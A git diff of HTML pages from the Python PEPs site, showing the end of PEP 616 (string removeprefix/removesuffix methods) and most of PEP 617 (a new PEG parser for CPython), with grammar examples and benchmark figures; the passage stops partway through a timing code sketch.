Post-History:
+
20-Mar-2020
+
+
+
+
+
+

Abstract

+

This is a proposal to add two new methods, removeprefix() and +removesuffix(), to the APIs of Python’s various string objects. These +methods would remove a prefix or suffix (respectively) from a string, +if present, and would be added to Unicode str objects, binary +bytes and bytearray objects, and collections.UserString.

+
+
+

Rationale

+

There have been repeated issues on Python-Ideas [2] [3], +Python-Dev [4] [5] [6] [7], the Bug Tracker, and +StackOverflow [8], related to user confusion about the +existing str.lstrip and str.rstrip methods. These users are +typically expecting the behavior of removeprefix and removesuffix, +but they are surprised that the parameter for lstrip is +interpreted as a set of characters, not a substring. This repeated +issue is evidence that these methods are useful. The new methods +allow a cleaner redirection of users to the desired behavior.

+

As another testimonial for the usefulness of these methods, several +users on Python-Ideas [2] reported frequently including similar +functions in their code for productivity. The implementation +often contained subtle mistakes regarding the handling of the empty +string, so a well-tested built-in method would be useful.

+

The existing solutions for creating the desired behavior are to either +implement the methods as in the Specification below, or to use +regular expressions as in the expression +re.sub('^' + re.escape(prefix), '', s), which is less discoverable, +requires a module import, and results in less readable code.

+
+
+

Specification

+

The builtin str class will gain two new methods which will behave +as follows when type(self) is type(prefix) is type(suffix) is str:

+
def removeprefix(self: str, prefix: str, /) -> str:
+    if self.startswith(prefix):
+        return self[len(prefix):]
+    else:
+        return self[:]
+
+def removesuffix(self: str, suffix: str, /) -> str:
+    # suffix='' should not call self[:-0].
+    if suffix and self.endswith(suffix):
+        return self[:-len(suffix)]
+    else:
+        return self[:]
+
+
+

When the arguments are instances of str subclasses, the methods should +behave as though those arguments were first coerced to base str +objects, and the return value should always be a base str.

+

Methods with the corresponding semantics will be added to the builtin +bytes and bytearray objects. If b is either a bytes +or bytearray object, then b.removeprefix() and b.removesuffix() +will accept any bytes-like object as an argument. The two methods will +also be added to collections.UserString, with similar behavior.
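
+
A few illustrative calls consistent with this specification (a hypothetical interpreter session):

+
>>> "FooBar".removeprefix("Foo")
+'Bar'
+>>> b"blob.bin".removesuffix(b".bin")
+b'blob'
+>>> class S(str): pass
+>>> type(S("test_x").removeprefix("test_"))  # always a base str
+<class 'str'>
+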

+
+
+

Motivating examples from the Python standard library

+

The examples below demonstrate how the proposed methods can make code +one or more of the following:

+
  1. Less fragile:

     The code will not depend on the user to count the length of a literal.
  2. More performant:

     The code does not require a call to the Python built-in len function nor to the more expensive str.replace() method.
  3. More descriptive:

     The methods give a higher-level API for code readability as opposed to the traditional method of string slicing.
+
+

find_recursionlimit.py

+
    +
  • Current:
    if test_func_name.startswith("test_"):
    +    print(test_func_name[5:])
    +else:
    +    print(test_func_name)
    +
    +
    +
  • +
  • Improved:
    print(test_func_name.removeprefix("test_"))
    +
    +
    +
  • +
+
+
+

deccheck.py

+

This is an interesting case because the author chose to use the +str.replace method in a situation where only a prefix was +intended to be removed.

+
    +
  • Current:
    if funcname.startswith("context."):
    +    self.funcname = funcname.replace("context.", "")
    +    self.contextfunc = True
    +else:
    +    self.funcname = funcname
    +    self.contextfunc = False
    +
    +
    +
  • +
  • Improved:
    if funcname.startswith("context."):
    +    self.funcname = funcname.removeprefix("context.")
    +    self.contextfunc = True
    +else:
    +    self.funcname = funcname
    +    self.contextfunc = False
    +
    +
    +
  • +
  • Arguably further improved:
    self.contextfunc = funcname.startswith("context.")
    +self.funcname = funcname.removeprefix("context.")
    +
    +
    +
  • +
+
+
+

cookiejar.py

+
    +
  • Current:
    def strip_quotes(text):
    +    if text.startswith('"'):
    +        text = text[1:]
    +    if text.endswith('"'):
    +        text = text[:-1]
    +    return text
    +
    +
    +
  • +
  • Improved:
    def strip_quotes(text):
    +    return text.removeprefix('"').removesuffix('"')
    +
    +
    +
  • +
+
+
+

test_i18n.py

+
    +
  • Current:
    creationDate = header['POT-Creation-Date']
    +
    +# peel off the escaped newline at the end of string
    +if creationDate.endswith('\\n'):
    +    creationDate = creationDate[:-len('\\n')]
    +
    +
    +
  • +
  • Improved:
    creationDate = header['POT-Creation-Date'].removesuffix('\\n')
    +
    +
    +
  • +
+

There were many other such examples in the stdlib.

+
+
+
+

Rejected Ideas

+
+

Expand the lstrip and rstrip APIs

+

Because lstrip takes a string as its argument, it could be viewed +as taking an iterable of length-1 strings. The API could, therefore, be +generalized to accept any iterable of strings, which would be +successively removed as prefixes. While this behavior would be +consistent, it would not be obvious for users to have to call +'foobar'.lstrip(('foo',)) for the common use case of a +single prefix.

+
+
+

Remove multiple copies of a prefix

+

This is the behavior that would be consistent with the aforementioned expansion of the lstrip/rstrip API – repeatedly applying the function until the argument is unchanged. This behavior is attainable from the proposed behavior via the following:

+
>>> s = 'Foo' * 100 + 'Bar'
+>>> prefix = 'Foo'
+>>> while s.startswith(prefix): s = s.removeprefix(prefix)
+>>> s
+'Bar'
+
+
+
+
+

Raising an exception when not found

+

There was a suggestion that s.removeprefix(pre) should raise an exception if not s.startswith(pre). However, this does not match the behavior and feel of other string methods. A required=False keyword could be added, but this violates the KISS principle.

+
+
+

Accepting a tuple of affixes

+

It could be convenient to write the test_concurrent_futures.py +example above as name.removesuffix(('Mixin', 'Tests', 'Test')), so +there was a suggestion that the new methods be able to take a tuple of +strings as an argument, similar to the startswith() API. Within +the tuple, only the first matching affix would be removed. This was +rejected on the following grounds:

+
    +
  • This behavior can be surprising or visually confusing, especially +when one prefix is empty or is a substring of another prefix, as in +'FooBar'.removeprefix(('', 'Foo')) == 'FooBar' +or 'FooBar text'.removeprefix(('Foo', 'FooBar ')) == 'Bar text'.
  • +
  • The API for str.replace() only accepts a single pair of +replacement strings, but has stood the test of time by refusing the +temptation to guess in the face of ambiguous multiple replacements.
  • +
  • There may be a compelling use case for such a feature in the future, +but generalization before the basic feature sees real-world use would +be easy to get permanently wrong.
  • +
+
+
+

Alternative Method Names

+

Several alternative method names have been proposed. Some are listed below, along with commentary for why they should be rejected in favor of removeprefix (the same arguments hold for removesuffix).

+
    +
  • ltrim, trimprefix, etc.:

    “Trim” does in other languages (e.g. JavaScript, Java, Go, PHP) +what strip methods do in Python.

    +
  • +
  • lstrip(string=...)

    This would avoid adding a new method, but for different +behavior, it’s better to have two different methods than one +method with a keyword argument that selects the behavior.

    +
  • +
  • remove_prefix:

    All of the other methods of the string API, e.g. +str.startswith(), use lowercase rather than +lower_case_with_underscores.

    +
  • +
  • removeleft, leftremove, or lremove:

    The explicitness of “prefix” is preferred.

    +
  • +
  • cutprefix, deleteprefix, withoutprefix, dropprefix, etc.:

    Many of these might have been acceptable, but “remove” is +unambiguous and matches how one would describe the “remove the prefix” +behavior in English.

    +
  • +
  • stripprefix:

    Users may benefit from remembering that “strip” means working +with sets of characters, while other methods work with +substrings, so re-using “strip” here should be avoided.

    +
  • +
+
+
+
+

How to Teach This

+

Among the uses for the partition(), startswith(), and +split() string methods or the enumerate() or zip() +built-in functions, a common theme is that if a beginner finds +themselves manually indexing or slicing a string, then they should +consider whether there is a higher-level method that better +communicates what the code should do rather than merely how the +code should do it. The proposed removeprefix() and +removesuffix() methods expand the high-level string “toolbox” and +further allow for this sort of skepticism toward manual slicing.

+

The main opportunity for user confusion will be the conflation of +lstrip/rstrip with removeprefix/removesuffix. +It may therefore be helpful to emphasize (as the documentation will) +the following differences between the methods:

+
    +
  • (l/r)strip:
      +
    • The argument is interpreted as a character set.
    • +
    • The characters are repeatedly removed from the appropriate end of +the string.
    • +
    +
  • +
  • remove(prefix/suffix):
      +
    • The argument is interpreted as an unbroken substring.
    • +
• At most one copy of the prefix/suffix is removed.
    • +
    +
  • +
+
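
+
A short session makes the distinction concrete (".txt" is treated as the character set {'.', 't', 'x'} by rstrip, but as a single substring by removesuffix):

+
>>> "text.txt".rstrip(".txt")        # strips characters from the set
+'te'
+>>> "text.txt".removesuffix(".txt")  # removes the exact substring, once
+'text'
+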
+
+

Reference Implementation

+

See the pull request on GitHub [1].

+
+
+

History of Major revisions

+
    +
  • Version 3: Remove tuple behavior.
  • +
  • Version 2: Changed name to removeprefix/removesuffix; +added support for tuples as arguments
  • +
  • Version 1: Initial draft with cutprefix/cutsuffix
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0616.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file
diff --git a/pep-0617/index.html b/pep-0617/index.html new file mode 100644 index 00000000000..909f9a94dcc --- /dev/null +++ b/pep-0617/index.html @@ -0,0 +1,904 @@
+ PEP 617 – New PEG parser for CPython | peps.python.org
+
+


+ + +
+
+
+

PEP 617 – New PEG parser for CPython

+
+
Author:
+
Guido van Rossum <guido at python.org>, +Pablo Galindo <pablogsal at python.org>, +Lysandros Nikolaou <lisandrosnik at gmail.com>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
24-Mar-2020
+
Python-Version:
+
3.9
+
Post-History:
+
02-Apr-2020
+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Full Grammar specification.

+


+

See PEP 1 for how to propose changes.

+
+
+

Overview

+

This PEP proposes replacing the current LL(1)-based parser of CPython +with a new PEG-based parser. This new parser would allow the elimination of multiple +“hacks” that exist in the current grammar to circumvent the LL(1)-limitation. +It would substantially reduce the maintenance costs in some areas related to the +compiling pipeline such as the grammar, the parser and the AST generation. The new PEG +parser will also lift the LL(1) restriction on the current Python grammar.

+
+
+

Background on LL(1) parsers

+

The current Python grammar is an LL(1)-based grammar. A grammar can be said to be +LL(1) if it can be parsed by an LL(1) parser, which in turn is defined as a +top-down parser that parses the input from left to right, performing leftmost +derivation of the sentence, with just one token of lookahead. +The traditional approach to constructing or generating an LL(1) parser is to +produce a parse table which encodes the possible transitions between all possible +states of the parser. These tables are normally constructed from the first sets +and the follow sets of the grammar:

+
    +
  • Given a rule, the first set is the collection of all terminals that can occur +first in a full derivation of that rule. Intuitively, this helps the parser decide +among the alternatives in a rule. For +instance, given the rule:
    rule: A | B
    +
    +
    +

    if only A can start with the terminal a and only B can start with the +terminal b and the parser sees the token b when parsing this rule, it knows +that it needs to follow the non-terminal B.

    +
  • +
  • An extension to this simple idea is needed when a rule may expand to the empty string. +Given a rule, the follow set is the collection of terminals that can appear +immediately to the right of that rule in a partial derivation. Intuitively, this +solves the problem of the empty alternative. For instance, +given this rule:
    rule: A 'b'
    +
    +
    +

    if the parser has the token b and the non-terminal A can only start +with the token a, then the parser can tell that this is an invalid program. +But if A could expand to the empty string (called an ε-production), +then the parser would recognise a valid empty A, +since the next token b is in the follow set of A.

    +
  • +
+

The current Python grammar does not contain ε-productions, so the follow sets are not +needed when creating the parse tables. Currently, in CPython, a parser generator +program reads the grammar and produces a parsing table representing a set of +deterministic finite automata (DFA) that can be included in a C program, the +parser. The parser is a pushdown automaton that uses this data to produce a Concrete +Syntax Tree (CST) sometimes known directly as a “parse tree”. In this process, the +first sets are used indirectly when generating the DFAs.

+

LL(1) parsers and grammars are usually efficient and simple to implement +and generate. However, it is not possible, under the LL(1) restriction, +to express certain common constructs in a way natural to the language +designer and the reader. This includes some in the Python language.

+

As LL(1) parsers can only look one token ahead to distinguish +possibilities, some rules in the grammar may be ambiguous. For instance the rule:

+
rule: A | B
+
+
+

is ambiguous if the first sets of both A and B have some elements in +common. When the parser sees a token in the input +program that both A and B can start with, it is impossible for it to deduce +which option to expand, as no further token of the program can be examined to +disambiguate. +The rule may be transformed to equivalent LL(1) rules, but then it may +be harder for a human reader to grasp its meaning. +Examples later in this document show that the current LL(1)-based +grammar suffers a lot from this scenario.

+

Another broad class of rules precluded by LL(1) is left-recursive rules. +A rule is left-recursive if it can derive to a +sentential form with itself as the leftmost symbol. For instance this rule:

+
rule: rule 'a'
+
+
+

is left-recursive because the rule can be expanded to an expression that starts +with itself. As will be described later, left-recursion is the natural way to +express certain desired language properties directly in the grammar.

+
+
+

Background on PEG parsers

+

A PEG (Parsing Expression Grammar) grammar differs from a context-free grammar +(like the current one) in the fact that the way it is written more closely +reflects how the parser will operate when parsing it. The fundamental technical +difference is that the choice operator is ordered. This means that when writing:

+
rule: A | B | C
+
+
+

a context-free-grammar parser (like an LL(1) parser) will generate constructions +that given an input string will deduce which alternative (A, B or C) +must be expanded, while a PEG parser will check if the first alternative succeeds +and only if it fails, will it continue with the second or the third one in the +order in which they are written. This makes the choice operator not commutative.

+

Unlike LL(1) parsers, PEG-based parsers cannot be ambiguous: if a string parses, +it has exactly one valid parse tree. This means that a PEG-based parser cannot +suffer from the ambiguity problems described in the previous section.

+

PEG parsers are usually constructed as a recursive descent parser in which every +rule in the grammar corresponds to a function in the program implementing the +parser and the parsing expression (the “expansion” or “definition” of the rule) +represents the “code” in said function. Each parsing function conceptually takes +an input string as its argument, and yields one of the following results:

+
    +
  • A “success” result. This result indicates that the expression can be parsed by +that rule and the function may optionally move forward or consume one or more +characters of the input string supplied to it.
  • +
  • A “failure” result, in which case no input is consumed.
  • +
+

Notice that “failure” results do not imply that the program is incorrect or a parsing failure; because the choice operator is ordered, a “failure” result merely indicates “try the following option”. A direct implementation of a PEG parser as a recursive descent parser will present exponential time performance in the worst case as compared with LL(1) parsers, because PEG parsers have infinite lookahead (this means that they can consider an arbitrary number of tokens before deciding on a rule). Usually, PEG parsers avoid this exponential time complexity with a technique called “packrat parsing” [1], which not only loads the entire program in memory before parsing it but also allows the parser to backtrack arbitrarily. This is made efficient by memoizing the rules already matched for each position. The cost of the memoization cache is that the parser will naturally use more memory than a simple LL(1) parser, which is normally table-based. We will explain later in this document why we consider this cost acceptable.
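
+
A minimal sketch of packrat-style memoization in a hand-written recursive descent parser (illustrative only; this is not the proposed generator's output):

+
TOKENS = ["1", "+", "2", "+", "3"]  # token stream for the input "1+2+3"
+CACHE = {}
+
+def memoize(func):
+    # Each (rule, position) pair is parsed at most once.
+    def wrapper(pos):
+        key = (func.__name__, pos)
+        if key not in CACHE:
+            CACHE[key] = func(pos)
+        return CACHE[key]
+    return wrapper
+
+@memoize
+def number(pos):
+    if pos < len(TOKENS) and TOKENS[pos].isdigit():
+        return pos + 1   # success: position after the match
+    return None          # failure: no input consumed
+
+@memoize
+def expr(pos):
+    # expr: number ('+' number)*
+    next_pos = number(pos)
+    while next_pos is not None and next_pos < len(TOKENS) and TOKENS[next_pos] == "+":
+        after = number(next_pos + 1)
+        if after is None:
+            break
+        next_pos = after
+    return next_pos
+
+print(expr(0))  # 5 -- the whole token stream was consumed
+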

+
+
+

Rationale

+

In this section, we describe a list of problems that are present in the current parser +machinery in CPython that motivates the need for a new parser.

+
+

Some rules are not actually LL(1)

+

Although the Python grammar is technically an LL(1) grammar (because it is parsed by +an LL(1) parser) several rules are not LL(1) and several workarounds are +implemented in the grammar and in other parts of CPython to deal with this. For +example, consider the rule for assignment expressions:

+
namedexpr_test: [NAME ':='] test
+
+
+

This simple rule is not compatible with the Python grammar as NAME is among the +elements of the first set of the rule test. To work around this limitation the +actual rule that appears in the current grammar is:

+
namedexpr_test: test [':=' test]
+
+
+

This is a much broader rule than the previous one, allowing constructs like [x for x in y] := [1,2,3]. The way the rule is limited to its desired form is by disallowing these unwanted constructions when transforming the parse tree to the abstract syntax tree. This is not only inelegant but also a considerable maintenance burden, as it forces the AST creation routines and the compiler into a situation in which they need to know how to separate valid programs from invalid programs, which should be a responsibility solely of the parser. This also leads to the actual grammar file not reflecting correctly what the actual grammar is (that is, the collection of all valid Python programs).

+

Similar workarounds appear in multiple other rules of the current grammar. Sometimes this problem is unsolvable. For instance, bpo-12782 (“Multiple context expressions do not support parentheses for continuation across lines”) shows how making an LL(1) rule that supports writing:

+
with (
+    open("a_really_long_foo") as foo,
+    open("a_really_long_baz") as baz,
+    open("a_really_long_bar") as bar
+):
+  ...
+
+
+

is not possible since the first sets of the grammar items that can +appear as context managers include the open parenthesis, making the rule +ambiguous. This rule is not only consistent with other parts of the language (like +the rule for multiple imports), but is also very useful to auto-formatting tools, +as parenthesized groups are normally used to group elements to be +formatted together (in the same way the tools operate on the contents of lists, +sets…).

+
+
+

Complicated AST parsing

+

Another problem of the current parser is that there is a huge coupling between the +AST generation routines and the particular shape of the produced parse trees. This +makes the code for generating the AST especially complicated as many actions and +choices are implicit. For instance, the AST generation code knows what +alternatives of a certain rule are produced based on the number of child nodes +present in a given parse node. This makes the code difficult to follow as this +property is not directly related to the grammar file and is influenced by +implementation details. As a result of this, a considerable amount of the AST +generation code needs to deal with inspecting and reasoning about the particular +shape of the parse trees that it receives.

+
+
+

Lack of left recursion

+

As described previously, a limitation of LL(1) grammars is that they cannot allow +left-recursion. This makes writing some rules very unnatural and far from how +programmers normally think about the program. For instance this construct (a simpler +variation of several rules present in the current grammar):

+
expr: expr '+' term | term
+
+
+

cannot be parsed by an LL(1) parser. The traditional remedy is to rewrite the +grammar to circumvent the problem:

+
expr: term ('+' term)*
+
+
+

The problem that appears with this form is that the parse tree is forced to have a +very unnatural shape. This is because with this rule, for the input program a + +b + c the parse tree will be flattened (['a', '+', 'b', '+', 'c']) and must +be post-processed to construct a left-recursive parse tree ([['a', '+', 'b'], +'+', 'c']). Being forced to write the second rule not only leads to the parse +tree not correctly reflecting the desired associativity, but also imposes further +pressure on later compilation stages to detect and post-process these cases.
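
+
The post-processing step alluded to here amounts to a left fold over the flattened sequence, e.g. (an illustrative helper, not CPython code):

+
def left_assoc(parts):
+    # Fold ['a', '+', 'b', '+', 'c'] into [['a', '+', 'b'], '+', 'c'].
+    tree = parts[0]
+    for i in range(1, len(parts), 2):
+        tree = [tree, parts[i], parts[i + 1]]
+    return tree
+
+print(left_assoc(['a', '+', 'b', '+', 'c']))  # [['a', '+', 'b'], '+', 'c']
+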

+
+
+

Intermediate parse tree

+

The last problem present in the current parser is the intermediate creation of a parse tree or Concrete Syntax Tree that is later transformed to an Abstract Syntax Tree. Although the construction of a CST is very common in parser and compiler pipelines, in CPython this intermediate CST is not used by anything else (it is only indirectly exposed by the parser module, and a surprisingly small part of the code in the CST production is reused in the module). Worse still, the whole tree is kept in memory, keeping many branches that consist of chains of nodes with a single child. This has been shown to consume a considerable amount of memory (for instance in bpo-26415: Excessive peak memory consumption by the Python parser).

+

Having to produce an intermediate result between the grammar and the AST is not only +undesirable but also makes the AST generation step much more complicated, raising +considerably the maintenance burden.

+
+
+
+

The new proposed PEG parser

+

The new proposed PEG parser contains the following pieces:

+
    +
  • A parser generator that can read a grammar file and produce a PEG parser +written in Python or C that can parse said grammar.
  • +
  • A PEG meta-grammar that automatically generates a Python parser that is used +for the parser generator itself (this means that there are no manually-written +parsers).
  • +
  • A generated parser (using the parser generator) that can directly produce C and +Python AST objects.
  • +
+
+

Left recursion

+

PEG parsers normally do not support left recursion but we have implemented a +technique similar to the one described in Medeiros et al. [2] but using the +memoization cache instead of static variables. This approach is closer to the one +described in Warth et al. [3]. This allows us to write not only simple left-recursive +rules but also more complicated rules that involve indirect left-recursion like:

+
rule1: rule2 | 'a'
+rule2: rule3 | 'b'
+rule3: rule1 | 'c'
+
+
+

and “hidden left-recursion” like:

+
rule: 'optional'? rule '@' some_other_rule
+
+
+
+
+

Syntax

+

The grammar consists of a sequence of rules of the form:

+
rule_name: expression
+
+
+

Optionally, a type can be included right after the rule name, which +specifies the return type of the C or Python function corresponding to +the rule:

+
rule_name[return_type]: expression
+
+
+

If the return type is omitted, then a void * is returned in C and an +Any in Python.

+
+

Grammar Expressions

+
+
# comment
+

Python-style comments.

+
+
+
e1 e2
+

Match e1, then match e2.

+
rule_name: first_rule second_rule
+
+
+
+
+
e1 | e2
+

Match e1 or e2.

+

The first alternative can also appear on the line after the rule name +for formatting purposes. In that case, a | must be used before the +first alternative, like so:

+
rule_name[return_type]:
+    | first_alt
+    | second_alt
+
+
+
+
+
( e )
+

Match e.

+
rule_name: (e)
+
+
+

A slightly more complex and useful example includes using the grouping +operator together with the repeat operators:

+
rule_name: (e1 e2)*
+
+
+
+
+
[ e ] or e?
+

Optionally match e.

+
rule_name: [e]
+
+
+

A more useful example includes defining that a trailing comma is +optional:

+
rule_name: e (',' e)* [',']
+
+
+
+
+
e*
+

Match zero or more occurrences of e.

+
rule_name: (e1 e2)*
+
+
+
+
+
e+
+

Match one or more occurrences of e.

+
rule_name: (e1 e2)+
+
+
+
+
+
s.e+
+

Match one or more occurrences of e, separated by s. The generated parse +tree does not include the separator. This is otherwise identical to +(e (s e)*).

+
rule_name: ','.e+
+
+
+
+
+
&e
+

Succeed if e can be parsed, without consuming any input.

+
+
+
!e
+

Fail if e can be parsed, without consuming any input.

+

An example taken from the proposed Python grammar specifies that a primary +consists of an atom, which is not followed by a . or a ( or a +[:

+
primary: atom !'.' !'(' !'['
+
+
+
+
+
~
+

Commit to the current alternative, even if it fails to parse.

+
rule_name: '(' ~ some_rule ')' | some_alt
+
+
+

In this example, if a left parenthesis is parsed, then the other alternative won’t be considered, even if some_rule or ')' fail to be parsed.

+
+
+
+

Variables in the Grammar

+

A subexpression can be named by preceding it with an identifier and an += sign. The name can then be used in the action (see below), like this:

+
rule_name[return_type]: '(' a=some_other_rule ')' { a }
+
+
+
+
+
+

Grammar actions

+

To avoid the intermediate steps that obscure the relationship between the +grammar and the AST generation the proposed PEG parser allows directly +generating AST nodes for a rule via grammar actions. Grammar actions are +language-specific expressions that are evaluated when a grammar rule is +successfully parsed. These expressions can be written in Python or C +depending on the desired output of the parser generator. This means that if +one would want to generate a parser in Python and another in C, two grammar +files should be written, each one with a different set of actions, keeping +everything else apart from said actions identical in both files. As an +example of a grammar with Python actions, the piece of the parser generator +that parses grammar files is bootstrapped from a meta-grammar file with +Python actions that generate the grammar tree as a result of the parsing.

+

In the specific case of the new proposed PEG grammar for Python, having +actions allows directly describing how the AST is composed in the grammar +itself, making it more clear and maintainable. This AST generation process is +supported by the use of some helper functions that factor out common AST +object manipulations and some other required operations that are not directly +related to the grammar.

+

To indicate these actions each alternative can be followed by the action code +inside curly-braces, which specifies the return value of the alternative:

+
rule_name[return_type]:
+    | first_alt1 first_alt2 { first_alt1 }
+    | second_alt1 second_alt2 { second_alt1 }
+
+
+

If the action is omitted and C code is being generated, then there are two +different possibilities:

+
  1. If there’s a single name in the alternative, this gets returned.
  2. If not, a dummy name object gets returned (this case should be avoided).
+

If the action is omitted and Python code is being generated, then a list +with all the parsed expressions gets returned (this is meant for debugging).

+

The full meta-grammar for the grammars supported by the PEG generator is:

+
start[Grammar]: grammar ENDMARKER { grammar }
+
+grammar[Grammar]:
+    | metas rules { Grammar(rules, metas) }
+    | rules { Grammar(rules, []) }
+
+metas[MetaList]:
+    | meta metas { [meta] + metas }
+    | meta { [meta] }
+
+meta[MetaTuple]:
+    | "@" NAME NEWLINE { (name.string, None) }
+    | "@" a=NAME b=NAME NEWLINE { (a.string, b.string) }
+    | "@" NAME STRING NEWLINE { (name.string, literal_eval(string.string)) }
+
+rules[RuleList]:
+    | rule rules { [rule] + rules }
+    | rule { [rule] }
+
+rule[Rule]:
+    | rulename ":" alts NEWLINE INDENT more_alts DEDENT {
+          Rule(rulename[0], rulename[1], Rhs(alts.alts + more_alts.alts)) }
+    | rulename ":" NEWLINE INDENT more_alts DEDENT { Rule(rulename[0], rulename[1], more_alts) }
+    | rulename ":" alts NEWLINE { Rule(rulename[0], rulename[1], alts) }
+
+rulename[RuleName]:
+    | NAME '[' type=NAME '*' ']' {(name.string, type.string+"*")}
+    | NAME '[' type=NAME ']' {(name.string, type.string)}
+    | NAME {(name.string, None)}
+
+alts[Rhs]:
+    | alt "|" alts { Rhs([alt] + alts.alts)}
+    | alt { Rhs([alt]) }
+
+more_alts[Rhs]:
+    | "|" alts NEWLINE more_alts { Rhs(alts.alts + more_alts.alts) }
+    | "|" alts NEWLINE { Rhs(alts.alts) }
+
+alt[Alt]:
+    | items '$' action { Alt(items + [NamedItem(None, NameLeaf('ENDMARKER'))], action=action) }
+    | items '$' { Alt(items + [NamedItem(None, NameLeaf('ENDMARKER'))], action=None) }
+    | items action { Alt(items, action=action) }
+    | items { Alt(items, action=None) }
+
+items[NamedItemList]:
+    | named_item items { [named_item] + items }
+    | named_item { [named_item] }
+
+named_item[NamedItem]:
+    | NAME '=' ~ item {NamedItem(name.string, item)}
+    | item {NamedItem(None, item)}
+    | it=lookahead {NamedItem(None, it)}
+
+lookahead[LookaheadOrCut]:
+    | '&' ~ atom {PositiveLookahead(atom)}
+    | '!' ~ atom {NegativeLookahead(atom)}
+    | '~' {Cut()}
+
+item[Item]:
+    | '[' ~ alts ']' {Opt(alts)}
+    |  atom '?' {Opt(atom)}
+    |  atom '*' {Repeat0(atom)}
+    |  atom '+' {Repeat1(atom)}
+    |  sep=atom '.' node=atom '+' {Gather(sep, node)}
+    |  atom {atom}
+
+atom[Plain]:
+    | '(' ~ alts ')' {Group(alts)}
+    | NAME {NameLeaf(name.string) }
+    | STRING {StringLeaf(string.string)}
+
+# Mini-grammar for the actions
+
+action[str]: "{" ~ target_atoms "}" { target_atoms }
+
+target_atoms[str]:
+    | target_atom target_atoms { target_atom + " " + target_atoms }
+    | target_atom { target_atom }
+
+target_atom[str]:
+    | "{" ~ target_atoms "}" { "{" + target_atoms + "}" }
+    | NAME { name.string }
+    | NUMBER { number.string }
+    | STRING { string.string }
+    | "?" { "?" }
+    | ":" { ":" }
+
+
+

As an illustrative example this simple grammar file allows directly +generating a full parser that can parse simple arithmetic expressions and that +returns a valid C-based Python AST:

+
start[mod_ty]: a=expr_stmt* $ { Module(a, NULL, p->arena) }
+expr_stmt[stmt_ty]: a=expr NEWLINE { _Py_Expr(a, EXTRA) }
+expr[expr_ty]:
+    | l=expr '+' r=term { _Py_BinOp(l, Add, r, EXTRA) }
+    | l=expr '-' r=term { _Py_BinOp(l, Sub, r, EXTRA) }
+    | t=term { t }
+
+term[expr_ty]:
+    | l=term '*' r=factor { _Py_BinOp(l, Mult, r, EXTRA) }
+    | l=term '/' r=factor { _Py_BinOp(l, Div, r, EXTRA) }
+    | f=factor { f }
+
+factor[expr_ty]:
+    | '(' e=expr ')' { e }
+    | a=atom { a }
+
+atom[expr_ty]:
+    | n=NAME { n }
+    | n=NUMBER { n }
+    | s=STRING { s }
+
+
+

Here EXTRA is a macro that expands to start_lineno, start_col_offset, +end_lineno, end_col_offset, p->arena, those being variables automatically +injected by the parser; p points to an object that holds on to all state +for the parser.

+

A similar grammar written to target Python AST objects:

+
start: expr NEWLINE? ENDMARKER { ast.Expression(expr) }
+expr:
+    | expr '+' term { ast.BinOp(expr, ast.Add(), term) }
+    | expr '-' term { ast.BinOp(expr, ast.Sub(), term) }
+    | term { term }
+
+term:
+    | l=term '*' r=factor { ast.BinOp(l, ast.Mult(), r) }
+    | term '/' factor { ast.BinOp(term, ast.Div(), factor) }
+    | factor { factor }
+
+factor:
+    | '(' expr ')' { expr }
+    | atom { atom }
+
+atom:
+    | NAME { ast.Name(id=name.string, ctx=ast.Load()) }
+    | NUMBER { ast.Constant(value=ast.literal_eval(number.string)) }
+
+
+
+
+
+

Migration plan

+

This section describes the migration plan when porting to the new PEG-based parser if this PEP is accepted. The migration will be executed in a series of steps that initially allow falling back to the previous parser if needed:

+
  1. Starting with Python 3.9 alpha 6, include the new PEG-based parser machinery in CPython with a command-line flag and environment variable that allow switching between the new and the old parsers, together with explicit APIs that allow invoking the new and the old parsers independently. At this step, all Python APIs like ast.parse and compile will use the parser set by the flags or the environment variable, and the default parser will be the new PEG-based parser.
  2. Between Python 3.9 and Python 3.10, the old parser and related code (like the “parser” module) will be kept until a new Python release happens (Python 3.10). In the meanwhile, and until the old parser is removed, no new Python grammar additions will be made that require the PEG parser. This means that the grammar will be kept LL(1) until the old parser is removed.
  3. In Python 3.10, remove the old parser, the command-line flag, the environment variable, and the “parser” module and related code.
+
+
+

Performance and validation

+

We have done extensive timing and validation of the new parser, and +this gives us confidence that the new parser is of high enough quality +to replace the current parser.

+
+

Validation

+

To start with validation, we regularly compile the entire Python 3.8 +stdlib and compare every aspect of the resulting AST with that +produced by the standard compiler. (In the process we found a few bugs +in the standard parser’s treatment of line and column numbers, which +we have all fixed upstream via a series of issues and PRs.)

+

We have also occasionally compiled a much larger codebase (the approx. +3800 most popular packages on PyPI) and this has helped us find a (very) +few additional bugs in the new parser.

+

(One area we have not explored extensively is rejection of all wrong +programs. We have unit tests that check for a certain number of +explicit rejections, but more work could be done, e.g. by using a +fuzzer that inserts random subtle bugs into existing code. We’re open +to help in this area.)

+
+
+

Performance

+

We have tuned the performance of the new parser to come within 10% of +the current parser both in speed and memory consumption. While the +PEG/packrat parsing algorithm inherently consumes more memory than the +current LL(1) parser, we have an advantage because we don’t construct +an intermediate CST.

+

Below are some benchmarks. These are focused on compiling source code +to bytecode, because this is the most realistic situation. Returning +an AST to Python code is not as representative, because the process to +convert the internal AST (only accessible to C code) to an +external AST (an instance of ast.AST) takes more time than the +parser itself.

+

All measurements reported here are done on a recent MacBook Pro, +taking the median of three runs. No particular care was taken to stop +other applications running on the same machine.

+

The first timings are for our canonical test file, which has 100,000 +lines endlessly repeating the following three lines:

+
1 + 2 + 4 + 5 + 6 + 7 + 8 + 9 + 10 + ((((((11 * 12 * 13 * 14 * 15 + 16 * 17 + 18 * 19 * 20))))))
+2*3 + 4*5*6
+12 + (2 * 3 * 4 * 5 + 6 + 7 * 8)
+
+
+
    +
  • Just parsing and throwing away the internal AST takes 1.16 seconds +with a max RSS of 681 MiB.
  • +
  • Parsing and converting to ast.AST takes 6.34 seconds, max RSS +1029 MiB.
  • +
  • Parsing and compiling to bytecode takes 1.28 seconds, max RSS 681 +MiB.
  • +
  • With the current parser, parsing and compiling takes 1.44 seconds, +max RSS 836 MiB.
  • +
+
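
A rough sketch of how such a measurement can be reproduced (the payload construction and the helper below are ours, not part of the PEP; the resource module is POSIX-only, and the units of ru_maxrss differ between platforms, e.g. kilobytes on Linux and bytes on macOS):

+
import resource
+import statistics
+import time
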